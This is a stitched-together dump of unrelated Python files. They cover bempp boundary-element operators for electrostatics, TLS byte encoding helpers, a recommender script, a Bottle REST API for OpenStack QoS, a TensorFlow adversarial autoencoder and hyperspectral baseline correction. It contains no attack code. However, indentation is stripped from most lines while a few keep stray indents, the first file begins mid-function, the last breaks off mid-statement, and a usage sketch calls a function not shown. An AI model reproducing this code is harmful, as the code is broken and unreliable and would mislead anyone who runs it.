dph_id = sparse.identity(neumann_space, neumann_space, neumann_space)
ep = ep_ex/ep_in
dF = laplace.double_layer(dirichl_space, dirichl_space, dirichl_space, assembler=operator_assembler)
dP = modified_helmholtz.double_layer(dirichl_space, dirichl_space, dirichl_space, kappa, assembler=operator_assembler)
L1 = (ep*dP) - dF
F = laplace.single_layer(neumann_space, dirichl_space, dirichl_space, assembler=operator_assembler)
P = modified_helmholtz.single_layer(neumann_space, dirichl_space, dirichl_space, kappa, assembler=operator_assembler)
L2 = F - P
ddF = laplace.hypersingular(dirichl_space, neumann_space, neumann_space, assembler=operator_assembler)
ddP = modified_helmholtz.hypersingular(dirichl_space, neumann_space, neumann_space, kappa, assembler=operator_assembler)
L3 = ddP - ddF
dF0 = laplace.adjoint_double_layer(neumann_space, neumann_space, neumann_space, assembler=operator_assembler)
dP0 = modified_helmholtz.adjoint_double_layer(neumann_space, neumann_space, neumann_space, kappa, assembler=operator_assembler)
L4 = dF0 - ((1.0/ep)*dP0)
A = bempp.api.BlockedOperator(2, 2)
A[0, 0] = (0.5*(1.0 + ep)*phi_id) - L1
A[0, 1] = (-1.0)*L2
    A[1, 0] = L3  # sign change due to bempp's definition
A[1, 1] = (0.5*(1.0 + (1.0/ep))*dph_id) - L4
@bempp.api.real_callable
def d_green_func(x, n, domain_index, result):
nrm = np.sqrt((x[0]-x_q[:,0])**2 + (x[1]-x_q[:,1])**2 + (x[2]-x_q[:,2])**2)
const = -1./(4.*np.pi*ep_in)
result[:] = const*np.sum(q*np.dot(x-x_q, n)/(nrm**3))
@bempp.api.real_callable
def green_func(x, n, domain_index, result):
nrm = np.sqrt((x[0]-x_q[:,0])**2 + (x[1]-x_q[:,1])**2 + (x[2]-x_q[:,2])**2)
result[:] = np.sum(q/nrm)/(4.*np.pi*ep_in)
rhs_1 = bempp.api.GridFunction(dirichl_space, fun=green_func)
rhs_2 = bempp.api.GridFunction(dirichl_space, fun=d_green_func)
return A, rhs_1, rhs_2
def laplaceMultitrace(dirichl_space, neumann_space, operator_assembler):
from bempp.api.operators.boundary import laplace
A = bempp.api.BlockedOperator(2, 2)
A[0, 0] = (-1.0)*laplace.double_layer(dirichl_space, dirichl_space, dirichl_space, assembler=operator_assembler)
A[0, 1] = laplace.single_layer(neumann_space, dirichl_space, dirichl_space, assembler=operator_assembler)
A[1, 0] = laplace.hypersingular(dirichl_space, neumann_space, neumann_space, assembler=operator_assembler)
A[1, 1] = laplace.adjoint_double_layer(neumann_space, neumann_space, neumann_space, assembler=operator_assembler)
return A
def modHelmMultitrace(dirichl_space, neumann_space, kappa, operator_assembler):
from bempp.api.operators.boundary import modified_helmholtz
A = bempp.api.BlockedOperator(2, 2)
A[0, 0] = (-1.0)*modified_helmholtz.double_layer(dirichl_space, dirichl_space, dirichl_space, kappa, assembler=operator_assembler)
A[0, 1] = modified_helmholtz.single_layer(neumann_space, dirichl_space, dirichl_space, kappa, assembler=operator_assembler)
A[1, 0] = modified_helmholtz.hypersingular(dirichl_space, neumann_space, neumann_space, kappa, assembler=operator_assembler)
A[1, 1] = modified_helmholtz.adjoint_double_layer(neumann_space, neumann_space, neumann_space, kappa, assembler=operator_assembler)
return A
def alpha_beta(dirichl_space, neumann_space, q, x_q, ep_in, ep_ex, kappa, alpha, beta, operator_assembler):
from bempp.api.operators.boundary import sparse
phi_id = sparse.identity(dirichl_space, dirichl_space, dirichl_space)
dph_id = sparse.identity(neumann_space, neumann_space, neumann_space)
ep = ep_ex/ep_in
A_in = laplaceMultitrace(dirichl_space, neumann_space, operator_assembler)
A_ex = modHelmMultitrace(dirichl_space, neumann_space, kappa, operator_assembler)
D = bempp.api.BlockedOperator(2, 2)
D[0, 0] = alpha*phi_id
D[0, 1] = 0.0*phi_id
D[1, 0] = 0.0*phi_id
D[1, 1] = beta*dph_id
E = bempp.api.BlockedOperator(2, 2)
E[0, 0] = phi_id
E[0, 1] = 0.0*phi_id
E[1, 0] = 0.0*phi_id
E[1, 1] = dph_id*(1.0/ep)
F = bempp.api.BlockedOperator(2, 2)
F[0, 0] = alpha*phi_id
F[0, 1] = 0.0*phi_id
F[1, 0] = 0.0*phi_id
F[1, 1] = dph_id*(beta/ep)
Id = bempp.api.BlockedOperator(2, 2)
Id[0, 0] = phi_id
Id[0, 1] = 0.0*phi_id
Id[1, 0] = 0.0*phi_id
Id[1, 1] = dph_id
interior_projector = ((0.5*Id)+A_in)
scaled_exterior_projector = (D*((0.5*Id)-A_ex)*E)
A = ((0.5*Id)+A_in)+(D*((0.5*Id)-A_ex)*E)-(Id+F)
@bempp.api.real_callable
def d_green_func(x, n, domain_index, result):
nrm = np.sqrt((x[0]-x_q[:,0])**2 + (x[1]-x_q[:,1])**2 + (x[2]-x_q[:,2])**2)
const = -1./(4.*np.pi*ep_in)
result[:] = (-1.0)*const*np.sum(q*np.dot(x-x_q, n)/(nrm**3))
@bempp.api.real_callable
def green_func(x, n, domain_index, result):
nrm = np.sqrt((x[0]-x_q[:,0])**2 + (x[1]-x_q[:,1])**2 + (x[2]-x_q[:,2])**2)
result[:] = (-1.0)*np.sum(q/nrm)/(4.*np.pi*ep_in)
rhs_1 = bempp.api.GridFunction(dirichl_space, fun=green_func)
rhs_2 = bempp.api.GridFunction(dirichl_space, fun=d_green_func)
return A, rhs_1, rhs_2, A_in, A_ex, interior_projector, scaled_exterior_projector
def alpha_beta_single_blocked_operator(dirichl_space, neumann_space, q, x_q, ep_in, ep_ex, kappa, alpha, beta, operator_assembler):
from bempp.api.operators.boundary import sparse, laplace, modified_helmholtz
dlp_in = laplace.double_layer(dirichl_space, dirichl_space, dirichl_space, assembler=operator_assembler)
slp_in = laplace.single_layer(neumann_space, dirichl_space, dirichl_space, assembler=operator_assembler)
hlp_in = laplace.hypersingular(dirichl_space, neumann_space, neumann_space, assembler=operator_assembler)
adlp_in = laplace.adjoint_double_layer(neumann_space, neumann_space, neumann_space, assembler=operator_assembler)
dlp_out = modified_helmholtz.double_layer(dirichl_space, dirichl_space, dirichl_space, kappa, assembler=operator_assembler)
slp_out = modified_helmholtz.single_layer(neumann_space, dirichl_space, dirichl_space, kappa, assembler=operator_assembler)
hlp_out = modified_helmholtz.hypersingular(dirichl_space, neumann_space, neumann_space, kappa, assembler=operator_assembler)
adlp_out = modified_helmholtz.adjoint_double_layer(neumann_space, neumann_space, neumann_space, kappa, assembler=operator_assembler)
phi_identity = sparse.identity(dirichl_space, dirichl_space, dirichl_space)
dph_identity = sparse.identity(neumann_space, neumann_space, neumann_space)
ep = ep_ex/ep_in
A = bempp.api.BlockedOperator(2, 2)
A[0, 0] = (-0.5*(1+alpha))*phi_identity + (alpha*dlp_out) - dlp_in
A[0, 1] = slp_in - ((alpha/ep)*slp_out)
A[1, 0] = hlp_in - (beta*hlp_out)
A[1, 1] = (-0.5*(1+(beta/ep)))*dph_identity + adlp_in - ((beta/ep)*adlp_out)
@bempp.api.real_callable
def d_green_func(x, n, domain_index, result):
nrm = np.sqrt((x[0]-x_q[:,0])**2 + (x[1]-x_q[:,1])**2 + (x[2]-x_q[:,2])**2)
const = -1./(4.*np.pi*ep_in)
result[:] = (-1.0)*const*np.sum(q*np.dot(x-x_q, n)/(nrm**3))
@bempp.api.real_callable
def green_func(x, n, domain_index, result):
nrm = np.sqrt((x[0]-x_q[:,0])**2 + (x[1]-x_q[:,1])**2 + (x[2]-x_q[:,2])**2)
result[:] = (-1.0)*np.sum(q/nrm)/(4.*np.pi*ep_in)
rhs_1 = bempp.api.GridFunction(dirichl_space, fun=green_func)
rhs_2 = bempp.api.GridFunction(dirichl_space, fun=d_green_func)
return A, rhs_1, rhs_2
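# Hedged usage sketch (not part of the original module): assemble the "direct" formulation on a
# unit sphere and solve it with GMRES. The mesh size, charge, permittivities and kappa are
# illustrative values, and it assumes bempp.api.linalg.gmres accepts a BlockedOperator together
# with a list of right-hand-side GridFunctions.
def _example_solve_direct():
    grid = bempp.api.shapes.sphere(h=0.5)
    dirichl_space = bempp.api.function_space(grid, "P", 1)
    neumann_space = bempp.api.function_space(grid, "P", 1)
    q = np.array([1.0])                  # a single unit charge ...
    x_q = np.array([[0.0, 0.0, 0.0]])    # ... placed at the sphere centre
    A, rhs_1, rhs_2 = direct(dirichl_space, neumann_space, q, x_q,
                             ep_in=4.0, ep_out=80.0, kappa=0.125,
                             operator_assembler="dense")
    sol, info = bempp.api.linalg.gmres(A, [rhs_1, rhs_2], tol=1e-5)
    # assuming the blocked solve returns the surface potential and its normal derivative
    phi, dphi = sol
    return phi, dphi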
|
import io
class Decode:
"""
Decode primitive values from bytes.
"""
@staticmethod
def u8(b):
assert len(b) == 1
return b[0]
@staticmethod
def u16(b):
assert len(b) == 2
return b[0] << 8 | b[1]
@staticmethod
def u24(b):
assert len(b) == 3
return b[0] << 16 | b[1] << 8 | b[2]
@staticmethod
def u32(b):
assert len(b) == 4
return b[0] << 24 | b[1] << 16 | b[2] << 8 | b[3]
class Read:
@staticmethod
def must(f, n):
"""
Read exactly n bytes from file-like object f. Raises
IOError if n bytes not available.
"""
x = f.read(n)
if x is None:
raise IOError('{0} bytes not available from file {1}'.format(n, f))
if len(x) != n:
raise IOError('short read from {0}: wanted {1} bytes, got {2}'.format(f, n, len(x)))
return x
@staticmethod
def partial(f, n):
"""
Read up to n bytes from file-like object f.
Returns the bytes, remain tuple (bytes is a bytes object,
remain is an integer). remain = n - len(bytes)
"""
x = f.read(n)
if x is None:
raise IOError('{0} bytes not available from file {1}'.format(n, f))
# return value-bytes, remain-int
return x, n - len(x)
u8 = lambda f: Decode.u8(Read.must(f, 1))
u16 = lambda f: Decode.u16(Read.must(f, 2))
u24 = lambda f: Decode.u24(Read.must(f, 3))
u32 = lambda f: Decode.u32(Read.must(f, 4))
@staticmethod
def maybe(child):
"""
Returns a file reading function, which fails softly
with a None rather than an exception.
"""
def reader(f):
try:
return child(f)
except:
return None
return reader
@staticmethod
def vec(f, lenf, itemf):
"""
Reads a vector of things from f, returning them as a list.
lenf is a function which reads a length from a file-like object.
itemf is a function which reads an arbitrary object from
a file-like object.
eg, to read a vector of shorts whose length is encoded with an octet:
Read.vec(f, Read.u8, Read.u16)
"""
o = []
# take length and read in whole body
ll = lenf(f)
body_bytes = Read.must(f, ll)
bodyf = io.BytesIO(body_bytes)
while bodyf.tell() != ll:
item = itemf(bodyf)
if item is not None:
o.append(item)
return o
class Encode:
"""
Encode assorted types to bytes/lists of bytes.
"""
@staticmethod
def u8(v):
assert v >= 0 and v <= 0xff
return [ v ]
@staticmethod
def u16(v):
assert v >= 0 and v <= 0xffff
return [ v >> 8 & 0xff, v & 0xff ]
@staticmethod
def u24(v):
assert v >= 0 and v <= 0xffffff
return [ v >> 16 & 0xff, v >> 8 & 0xff, v & 0xff ]
@staticmethod
def u32(v):
assert v >= 0 and v <= 0xffffffff
return [ v >> 24 & 0xff, v >> 16 & 0xff, v >> 8 & 0xff, v & 0xff ]
@staticmethod
def u64(v):
assert v >= 0 and v <= 0xffffffffffffffff
return Encode.u32(v >> 32) + Encode.u32(v & 0xffffffff)
@staticmethod
def item_vec(lenf, itemf, items):
"""
Encode the vector of items. Each item is encoded with itemf,
the length of the vector (in bytes, not items) is encoded with
lenf.
"""
body = []
for x in items:
body.extend(itemf(x))
return lenf(len(body)) + body
@staticmethod
def vec(lenf, items):
"""
Encode the vector of items. Each item is encoded with item.encode(),
the length of the vector (in bytes, not items) is encoded with
lenf.
"""
body = []
for x in items:
body.extend(x.encode())
return lenf(len(body)) + body
class Struct:
"""
Base class for all structures in TLS.
This knows how to encode itself into bytes, decode from bytes,
make nice stringified versions of itself, etc.
"""
def __bytes__(self):
return bytes(self.encode())
@classmethod
def decode(cls, b, *args, **kwargs):
f = io.BytesIO(b)
r = cls.read(f, *args, **kwargs)
return r
def __repr__(self):
return str(self)
def __str__(self):
o = []
for k in sorted(self.__dict__.keys()):
if k[0] == '_':
continue
o.append('{0} = {1}'.format(k, self.__dict__[k]))
return '<{0} {1}>'.format(self.__class__.__name__, ', '.join(o))
class Enum:
"""
Base class for all enumerations in TLS.
You need to set _Decode, _Encode and _ByteSize.
You also need to set class-level values for each value in
the enumeration, plus one named MAX which should be the maximum
allowed enumeration.
    This knows how to read values from a file-like object, validate them, and encode them back to bytes.
"""
@classmethod
def read(cls, f, lax_enum = False):
"""
Read a value from the file-like f.
If lax_enum is True, then this function does
not raise if the read value is unknown.
Otherwise, this function raises if the value read
is unknown.
"""
v = Read.must(f, cls._ByteSize)
v = cls._Decode(v)
if lax_enum is False:
cls.lookup(v)
return v
@classmethod
def table(cls):
"""
Returns a dict of values to names.
"""
d = {}
for k, v in cls.__dict__.items():
if not k.isidentifier() or k[0] == '_' or k == 'MAX':
continue
if v in d:
raise ValueError('{0} has more than one mapping for value {1:x} (at least {2!r} and {3!r})'.format(cls.__name__, v, d[v], k))
d[v] = k
return d
@classmethod
def lookup(cls, value):
"""
Ensures the given value is valid for this enum.
Raises if not.
"""
if value > cls.MAX:
raise ValueError('{0:x} cannot be decoded as a {1}: too large'.format(value, cls.__name__))
d = cls.table()
if value in d:
return d[value]
raise ValueError('{0:x} cannot be decoded as a {1}: unknown value'.format(value, cls.__name__))
@classmethod
def tostring(cls, value):
name = cls.lookup(value)
return '<{0} {1} ({2:x})>'.format(cls.__name__, name, value)
@classmethod
def to_json(cls, value):
try:
return [value, cls.__name__, cls.lookup(value)]
except ValueError:
return value
@classmethod
def encode(cls, value):
return cls._Encode(value)
@classmethod
def all(cls):
return [value for value, name in cls.table().items()]
class Enum8(Enum):
"""
An enum encoded in a single octet.
"""
_ByteSize = 1
_Encode = Encode.u8
_Decode = Decode.u8
MAX = 0xff
class Enum16(Enum):
"""
An enum encoded in a short.
"""
_ByteSize = 2
_Encode = Encode.u16
_Decode = Decode.u16
MAX = 0xffff
if __name__ == '__main__':
class DemoEnum(Enum8):
Pony = 1
Breakfast = 2
Jubilee = 3
Combine = 5
print(DemoEnum.tostring(DemoEnum.read(io.BytesIO(b'\x02'))))
print(DemoEnum.table())
print(Encode.item_vec(Encode.u16, DemoEnum.encode, [1, 2, 3, 5]))
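    # A few more illustrative round-trips (a sketch relying only on the
    # Encode/Decode/Read helpers defined above):
    #   Encode.u16(0x1234)                    -> [0x12, 0x34]
    #   Decode.u16(bytes(Encode.u16(0x1234))) -> 0x1234
    #   Read.vec(io.BytesIO(b'\x04\x00\x01\x00\x02'), Read.u8, Read.u16) -> [1, 2]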
|
# -*- coding: utf-8 -*-
#
# Licensed under the terms of the BSD 3-Clause or the CeCILL-B License
# (see codraft/__init__.py for details)
"""
CodraFT, the Codra Filtering Tool
Simple signal and image processing application based on guiqwt and guidata
Starter
"""
from codraft.app import run
run()
|
from fast_import import *
import sys
arg = sys.argv[1:]
#arg = ['offline']
mode = arg[0]
save = True
filename = mode+'_npz/'+'cb_al_'+mode+'.npz'
if len(arg) > 1:
    eurm_k = int(arg[1])
else:
    eurm_k = 750
configs =[
{'cat':2, 'alpha':1, 'beta':0, 'k':60, 'shrink':0,'threshold':0 },
{'cat':3, 'alpha':0.75, 'beta':0, 'k':50, 'shrink':0,'threshold':0 },
{'cat':4, 'alpha':0.7, 'beta':0, 'k':80, 'shrink':0,'threshold':0 },
{'cat':5, 'alpha':1, 'beta':0, 'k':70, 'shrink':0,'threshold':0 },
{'cat':6, 'alpha':1, 'beta':0, 'k':60, 'shrink':0,'threshold':0 },
{'cat':7, 'alpha':1, 'beta':0, 'k':50, 'shrink':0,'threshold':0 },
{'cat':8, 'alpha':0.7, 'beta':0, 'k':65, 'shrink':0,'threshold':0 },
{'cat':9, 'alpha':0.8, 'beta':0, 'k':65, 'shrink':0,'threshold':0 },
{'cat':10,'alpha':0.8, 'beta':0, 'k':50, 'shrink':0,'threshold':0 },
]
#common part
dr = Datareader(mode=mode, only_load=True, verbose=False)
urm = sp.csr_matrix(dr.get_urm(), dtype=np.float64)
icm = dr.get_icm(arid=False,alid=True)
rec = CB_AL_BM25(urm=urm, icm=icm, binary=True, datareader=dr, mode=mode, verbose=True, verbose_evaluation= False)
eurm = sp.csr_matrix(urm.shape)
for c in configs:
pids = dr.get_test_pids(cat=c['cat'])
rec.model(alpha=c['alpha'], k=c['k'], shrink=c['shrink'], threshold=c['threshold'])
rec.recommend(target_pids=pids, eurm_k=eurm_k)
rec.clear_similarity()
eurm = eurm + rec.eurm
rec.clear_eurm()
pids = dr.get_test_pids()
eurm = eurm[pids]
if mode=='offline':
rec_list = post.eurm_to_recommendation_list(eurm=eurm, datareader=dr, remove_seed=True, verbose=False)
mean, full = rec.ev.evaluate(rec_list, str(rec) , verbose=True, return_result='all')
if save:
sp.save_npz(filename ,eurm)
|
# Copyright 2015 Technische Universitaet Berlin
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import logging
from bottle import Bottle, response, request
from core.agent import Agent as CMAgent
__author__ = 'beb'
"""
# Private error methods
"""
def bad_request(param):
response.body = param
response.status = 400
response.content_type = 'application/json'
return response
def internal_error(message):
response.body = message
response.status = 500
response.content_type = 'application/json'
return response
def not_found(message):
response.body = message
response.status = 404
response.content_type = 'application/json'
return response
def encode_dict_json(data_dict):
data_json = json.dumps(data_dict)
return data_json
"""
# ReST API
"""
class Application:
def __init__(self, host, port):
self._host = host
self._port = port
self._app = Bottle()
self._route()
self._debug = True
self.agent = CMAgent()
def _route(self):
# Welcome Screen
self._app.route('/', method="GET", callback=self._welcome)
# Hypervisor methods
self._app.route('/hosts', method="GET", callback=self._hosts_list)
# QoS methods
self._app.route('/qoses', method=["POST", "OPTIONS"], callback=self._qoses_set)
def start(self):
self._app.run(host=self._host, port=self._port)
def _welcome(self):
response.body = "Welcome to the Connectivity Manager Agent"
response.status = 200
return response
def _hosts_list(self):
"""
List all OpenStack hypervisors with runtime details
"""
agent = CMAgent()
hypervisors = agent.list_hypervisors()
response.body = encode_dict_json(hypervisors)
        logging.debug('Hypervisor list response: %s', response.body)
response.status = 200
response.content_type = 'application/json'
return response
def _qoses_set(self):
"""
Set QoS for VMs
"""
qos_json = request.body.getvalue()
logging.debug('QoS JSON is: %s', qos_json)
if not qos_json:
return bad_request('This POST methods requires a valid JSON')
try:
set_qos = self.agent.set_qos(qos_json)
        except Exception as exc:
            logging.error(str(exc))
            return internal_error(str(exc))
response.status = 200
response.body = encode_dict_json(set_qos)
logging.debug('QoS processed: %s', response.body)
return response
if __name__ == '__main__':
logging.basicConfig(format='%(asctime)s_%(process)d:%(lineno)d [%(levelname)s] %(message)s',level=logging.INFO)
server = Application(host='0.0.0.0', port=8091)
print('Connectivity Manager Agent serving on port 8091...')
server.start()
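# Illustrative requests against the API above (a sketch; assumes the agent is
# running locally on port 8091, and that qos.json follows the schema expected by
# CMAgent.set_qos, which is not shown here):
#   curl http://localhost:8091/hosts
#   curl -X POST -H 'Content-Type: application/json' -d @qos.json http://localhost:8091/qoses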
|
import numpy as np
import typing
import time
import tensorflow as tf
# convenient abbreviations
tfk = tf.keras
tfka = tfk.activations
tfkl = tf.keras.layers
# adversarial convolutional autoencoder
class AAE(object):
def __init__(self,
latent_dim: int, # latent dimension of style vector
num_label: int, # number of possible labels
feature_shape: typing.Tuple[int, int, int], # x-y-channel
MNIST: bool=False, # test flag
):
        # initialize the superclass (AAE derives from object here, not tf.keras.Model)
super().__init__()
# set attributes
self.latent_dim = latent_dim
self.num_label = num_label
self.feature_shape = feature_shape
# download VGG19 first two convolution layers
print('downloading VGG19...')
vgg_model = tfk.applications.vgg19.VGG19(include_top=False, weights='imagenet')
# TODO: pseudo-coloring: 1x1 conv layers, trainable, 30->10->3
# define convolutional layers
forward_layers = []
backward_layers = []
x_shrink_factor = 1
y_shrink_factor = 1
if MNIST:
layers = vgg_model.layers[1:7]
else:
layers = vgg_model.layers[1:]
print('parsing VGG19...')
for layer in layers: # skip original input layer
if isinstance(layer, tfkl.Conv2D):
new_forward_layer = tfkl.Conv2D(
filters=layer.filters,
kernel_size=layer.kernel_size,
strides=layer.strides,
padding=layer.padding,
activation=layer.activation,
)
new_backward_layer = tfkl.Conv2DTranspose(
filters=layer.filters,
kernel_size=layer.kernel_size,
strides=layer.strides,
padding=layer.padding,
activation=layer.activation,
)
elif isinstance(layer, tfkl.MaxPool2D):
new_forward_layer = tfkl.MaxPool2D(
pool_size=layer.pool_size,
strides=layer.strides,
padding=layer.padding,
)
new_backward_layer = tfkl.UpSampling2D(
size=layer.pool_size,
)
else:
raise ValueError('unrecognized layer in VGG19 {}'.format(type(layer)))
forward_layers.append(new_forward_layer)
backward_layers.insert(0, new_backward_layer)
x_shrink_factor *= layer.strides[0]
y_shrink_factor *= layer.strides[1]
# define params
deconv_shape = (
int(feature_shape[0]/x_shrink_factor),
int(feature_shape[1]/y_shrink_factor),
int(forward_layers[-2].filters),
)
reconstruct_filter = feature_shape[2]
reconstruct_kernel_size = (3, 3)
reconstruct_strides = (1, 1)
# define networks
print('building networks...')
self.inference_net = tfk.Sequential(
[tfkl.InputLayer(input_shape=feature_shape)]\
+ forward_layers\
+ [tfkl.Flatten()]\
+ [tfkl.Dense(units=latent_dim+num_label)])
self.generation_net = tfk.Sequential(
[tfkl.InputLayer(input_shape=(latent_dim+num_label,))]\
+ [tfkl.Dense(
units=deconv_shape[0]*deconv_shape[1]*deconv_shape[2],
activation=tfka.relu)]\
+ [tfkl.Reshape(target_shape=deconv_shape)]\
+ backward_layers\
+ [tfkl.Conv2DTranspose( # final deconvolution layer
filters=reconstruct_filter,
kernel_size=reconstruct_kernel_size,
strides=reconstruct_strides,
padding='same',
activation=tfka.sigmoid)])
self.regularization_net = tfk.Sequential(
[tfkl.InputLayer(input_shape=(latent_dim,))]\
+ [tfkl.Dense(units=32, activation=tfka.relu)]\
+ [tfkl.Dense(units=64, activation=tfka.relu)]\
+ [tfkl.Dense(units=2, activation=tfka.softmax)])
self.classification_net = tfk.Sequential(
[tfkl.InputLayer(input_shape=(num_label,))]\
+ [tfkl.Dense(units=32, activation=tfka.relu)]\
+ [tfkl.Dense(units=64, activation=tfka.relu)]\
+ [tfkl.Dense(units=2, activation=tfka.softmax)])
        # copy VGG19 convolution weights and freeze them (non-trainable)
# note: new model layers count skips InputLayer
print('copying weights from VGG19...')
for index in range(1, 1+len(forward_layers)):
if isinstance(vgg_model.layers[index], tfkl.Conv2D):
self.inference_net.layers[index-1].set_weights(vgg_model.layers[index].get_weights())
self.inference_net.layers[index-1].trainable = False
def infer(self, x):
vector_pred = self.inference_net(x)
z_pred, y_pred_logit = tf.split(vector_pred, [self.latent_dim, self.num_label], axis=1)
y_pred = tfka.softmax(y_pred_logit)
return z_pred, y_pred
def generate(self, z_pred, y_pred):
vector_pred = tf.concat([z_pred, y_pred], axis=1)
return self.generation_net(vector_pred)
def regularize(self, z_pred):
N = z_pred.shape[0]
normal_sample = tf.random.normal(
shape=z_pred.shape,
mean=0.0,
stddev=1.0,
)
positive_pred = self.regularization_net(normal_sample)
negative_pred = self.regularization_net(z_pred)
positive_label = tf.one_hot(tf.ones([N], dtype=tf.int32), depth=2)
negative_label = tf.one_hot(tf.zeros([N], dtype=tf.int32), depth=2)
discrimination_loss = tfk.losses.categorical_crossentropy(positive_label, positive_pred)\
+ tfk.losses.categorical_crossentropy(negative_label, negative_pred)
confusion_loss = tfk.losses.categorical_crossentropy(positive_label, negative_pred)\
+ tfk.losses.categorical_crossentropy(negative_label, positive_pred)
return discrimination_loss, confusion_loss
def classify(self, y_pred):
N = y_pred.shape[0]
categorical_sample = tf.random.categorical(
logits=tf.math.log(y_pred),
num_samples=1, # per row
)
        # categorical_sample has shape [N, 1]; squeeze to [N] before one-hot encoding
        onehot_sample = tf.one_hot(tf.squeeze(categorical_sample, axis=1), depth=self.num_label)
positive_pred = self.classification_net(onehot_sample)
negative_pred = self.classification_net(y_pred)
positive_label = tf.one_hot(tf.ones([N], dtype=tf.int32), depth=2)
negative_label = tf.one_hot(tf.zeros([N], dtype=tf.int32), depth=2)
discrimination_loss = tfk.losses.categorical_crossentropy(positive_label, positive_pred)\
+ tfk.losses.categorical_crossentropy(negative_label, negative_pred)
confusion_loss = tfk.losses.categorical_crossentropy(positive_label, negative_pred)\
+ tfk.losses.categorical_crossentropy(negative_label, positive_pred)
return discrimination_loss, confusion_loss
def compute_loss(self, x, context):
N = x.shape[0]
z_pred, y_pred = self.infer(x)
x_pred = self.generate(z_pred, y_pred)
reconstruction_loss = tfk.losses.MSE(x, x_pred)
if context == 'reconstruction':
return reconstruction_loss
regularization_loss = self.regularize(z_pred)
classification_loss = self.classify(y_pred)
discrimination_loss = regularization_loss[0] + classification_loss[0]
confusion_loss = regularization_loss[1] + classification_loss[1]
if context == 'discrimination':
return discrimination_loss
elif context == 'confusion':
return confusion_loss
elif context == 'evaluation':
return reconstruction_loss, discrimination_loss, confusion_loss
def compute_apply_gradients(self, x, context, optimizer_dict):
if context == 'reconstruction':
var_list = self.inference_net.trainable_variables + self.generation_net.trainable_variables
optimizer_dict[context].minimize(
loss=lambda: self.compute_loss(x, context=context),
var_list=var_list,
)
elif context == 'discrimination':
var_list =self.regularization_net.trainable_variables\
+ self.classification_net.trainable_variables
optimizer_dict[context].minimize(
loss=lambda: self.compute_loss(x, context=context),
var_list=var_list,
)
elif context == 'confusion':
var_list = self.inference_net.trainable_variables
optimizer_dict[context].minimize(
loss=lambda: self.compute_loss(x, context=context),
var_list=var_list,
)
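# Illustrative instantiation and forward passes (a sketch; the shapes below are
# assumptions, not values taken from this file):
#   model = AAE(latent_dim=32, num_label=10, feature_shape=(224, 224, 3))
#   z, y = model.infer(images)      # split into style vector and label probabilities
#   x_rec = model.generate(z, y)    # reconstruct images from the concatenated vector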
|
''' This submodule provides basic preprocessing functionality to work with hyperspectral data/images.
E.g.
- Normalization
- Baseline Correction/Removal
- RGB-Image standardization
- Scatter correction (especially RMieS-correction)
- Data transformations from 3D to 2D and reverse
- ...
'''
# IMPORTS
#########
import numpy as np
# FUNCTIONS
###########
def _baseline_corr(data, lam=1000, p=0.05, n_iter=10):
    ''' Asymmetric least squares smoothing for baseline estimation/removal.
    Adapted from Eilers and Boelens (2005), with optimized memory usage.
    Two parameters: lam (lambda) controls smoothness and p controls asymmetry.
    For data with positive peaks, 0.001 <= p <= 0.1 and 10^2 <= lam <= 10^9 are generally good choices.
    The number of iterations defaults to 10 (n_iter); increase it if the weights have not converged.
    Returns the estimated baseline; subtract it from the input data to obtain the corrected spectrum.
    '''
from scipy import sparse
from scipy.sparse.linalg import spsolve
data_length = len(data)
D = sparse.diags([1, -2, 1], [0, -1, -2], shape=(data_length, data_length - 2))
D = lam * D.dot(D.T)
weights = np.ones(data_length)
W = sparse.spdiags(weights, 0, data_length, data_length)
for i in range(n_iter):
W.setdiag(weights)
Z = W + D
z = spsolve(Z, weights * data)
weights = p * (data > z) + (1 - p) * (data < z)
return z
def baseline_als(data, lam=1000, p=0.05, n_iter=10):
    '''Checks the input data shape. A single 1-D spectrum is passed directly to the
    subfunction _baseline_corr; a 2-D array of shape (number of spectra, data points)
    is processed spectrum by spectrum.
    Returns the estimated baseline(s) as a numpy array; subtract from the input data
    to obtain the baseline-corrected spectra.
    '''
if len(data.shape) == 1:
result = np.array(_baseline_corr(data, lam, p, n_iter))
return result
elif len(data.shape) == 2:
result = np.array([_baseline_corr(i, lam, p, n_iter) for i in data])
return result
    else:
        print(
            'Data shape error! Expected a 1-D spectrum or a 2-D array of shape (number of spectra, data points).')
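# Illustrative usage on a synthetic spectrum (a sketch; baseline_als returns the
# estimated baseline, so the correction is the difference):
#   x = np.linspace(0, 100, 500)
#   spectrum = np.exp(-(x - 50) ** 2 / 20.0) + 0.01 * x
#   corrected = spectrum - baseline_als(spectrum, lam=1e5, p=0.01)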
# ---------------------------------------------------------------------------
# AS IMPLEMENTED BY SHUXIA GUO DURING THE INITIAL HACKATHON
# ---------------------------------------------------------------------------
from typing import Union as U, Tuple as T, Optional
from sklearn.decomposition import PCA
from sklearn.model_selection import LeaveOneGroupOut
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.metrics import confusion_matrix
import numpy as np
def emsc(spectra: np.ndarray,
wavenumbers: np.ndarray,
poly_order: Optional[int] = 2,
reference: np.ndarray = None,
constituents: np.ndarray = None,
use_reference: bool = True,
return_coefs: bool = False) -> U[np.ndarray, T[np.ndarray, np.ndarray]]:
"""
Preprocess all spectra with EMSC
:param spectra: ndarray of shape [n_samples, n_channels]
:param wavenumbers: ndarray of shape [n_channels]
:param poly_order: order of polynomial
None: EMSC without polynomial components
:param reference: reference spectrum
None: use average spectrum as reference;
:param constituents: ndarray of shape [n_consituents, n_channels]
Except constituents it can also take orthogonal vectors,
for example from PCA.
:param use_reference: if False not include reference in the model
:param return_coefs: if True returns coefficients
        [n_samples, n_coeffs], where n_coeffs = 1 + len(constituents) + (order + 1).
Order of returned coefficients:
1) b*reference + # reference coeff
k) c_0*constituent[0] + ... + c_k*constituent[k] + # constituents coeffs
a_0 + a_1*w + a_2*w^2 + ... # polynomial coeffs
:return: preprocessed spectra, [coefficients]
"""
# assert poly_order >= 0, 'poly_order must be >= 0'
if reference is None:
reference = np.mean(spectra, axis=0)
reference = reference[:, np.newaxis]
half_rng = np.abs(wavenumbers[0] - wavenumbers[-1]) / 2
normalized_wns = (wavenumbers - np.mean(wavenumbers)) / half_rng
if poly_order is None:
if constituents is None:
            columns = (reference,)
else:
columns = (reference, constituents.T)
else:
